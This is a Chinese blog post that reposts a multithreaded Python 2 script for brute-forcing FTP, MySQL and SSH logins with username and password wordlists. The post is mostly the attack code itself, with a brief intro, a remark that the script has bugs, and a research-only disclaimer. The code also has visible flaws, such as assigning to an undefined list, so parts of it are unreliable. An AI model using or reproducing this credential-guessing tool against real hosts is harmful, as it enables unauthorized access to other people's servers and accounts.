小弟的博客曾共享多比较多的python暴力破解实例,但是一直没有将这些都集成在一个python脚本中,还好有朋友已经完成了此操作,就不需要我再自己去折腾一个了,常关注小弟博客的小伙伴们有福了,这就为你送上集成各种破解的python脚本。。。
使用方法如下图:
脚本代码如下:
#coding:utf-8
from optparse import OptionParser
import time,re,sys,threading,Queue
import ftplib,socket,MySQLdb,paramiko
global host
queue = Queue.Queue()
#********************************************
#color
#********************************************
class bcolors:
OKBLUE = '\033[94m'
FAIL = '\033[91m'
ENDC = '\033[0m'
#********************************************
#FTP爆破模块
#********************************************
class FtpBurp(threading.Thread):
"""docstring for ftp"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
user,pwd = self.queue.get()
try:
ftp = ftplib.FTP()
ftp.connect(host,21,timeout=10)
ftp.login(user,pwd)
print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd)
ftp.quit()
except ftplib.all_errors:
print bcolors.FAIL+'[*]'+user+'----'+pwd
self.queue.task_done()
#********************************************
#MySql爆破模块
#********************************************
class MySql(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
user,pwd = self.queue.get()
try:
conn = MySQLdb.connect(host=host, user=user,passwd=pwd,db='mysql',port=3306)
print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd)
if conn:
conn.close()
except MySQLdb.Error, msg:
print bcolors.FAIL+'[*]'+user+'----'+pwd
self.queue.task_done()
#********************************************
#SSH爆破模块
#********************************************
class SSH(threading.Thread):
"""docstring for SSH"""
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
user,pwd = self.queue.get()
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host,22,user,pwd,timeout=5)
print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd)
ssh.close()
exit()
except Exception,e:
print bcolors.FAIL+'[*]'+user+'----'+pwd
self.queue.task_done()
#********************************************
#可添加web后台爆破
#********************************************
usage = 'Usage: %prog [-t target] [-m method]'
parser = OptionParser(usage)
parser.add_option('-t', dest='target', help='host')
parser.add_option('-m', dest='method', help='ways')
parser.add_option('-u', dest='username', help='username')
parser.add_option('-U', dest='usernamedic', help='username')
parser.add_option('-P', dest='passworddic', help='password')
parser.add_option('-n', dest='threading', help='Thread')
(options, args) = parser.parse_args()
if options.target == None:
parser.print_help()
sys.exit(0)
if options.threading:
n = int(options.threading)
else:
n = 5
if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', options.target):
host = options.target
else :
host = socket.gethostbyname(options.target)
print 'target: %s \n' % host
if options.username :
userlist[0] = options.username
print 'username: %s' % options.username
elif options.usernamedic:
userlist = [j.strip() for j in open(options.usernamedic)]
print 'username_number: %d $\n' % len(userlist)
passlist = [j.strip() for j in open(options.passworddic)]
print 'password_number: %d $\n' % len(passlist)
if options.method == 'ftp':
for i in range(n):
m_ftp = FtpBurp(queue)
m_ftp.setDaemon(True)
m_ftp.start()
for user in userlist:
for pwd in passlist:
queue.put((user,pwd))
if options.method == 'mysql':
for i in range(n):
m_sql = MySql(queue)
m_sql.setDaemon(True)
m_sql.start()
for user in userlist:
for pwd in passlist:
queue.put((user,pwd))
if options.method == 'ssh':
for i in range(n):
m_ssh = SSH(queue)
m_ssh.setDaemon(True)
m_ssh.start()
for user in userlist:
for pwd in passlist:
queue.put((user,pwd))
queue.join()
经测试,代码在windows下面有点问题,估计linux下面也有点小问题,共享出来仅为让小伙伴们学习一下集成多模块破解的思路而已。
脚本转自:http://bbs.isilic.org/thread-6943-1-1.html
from www.waitalone.cn.thanks for it.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论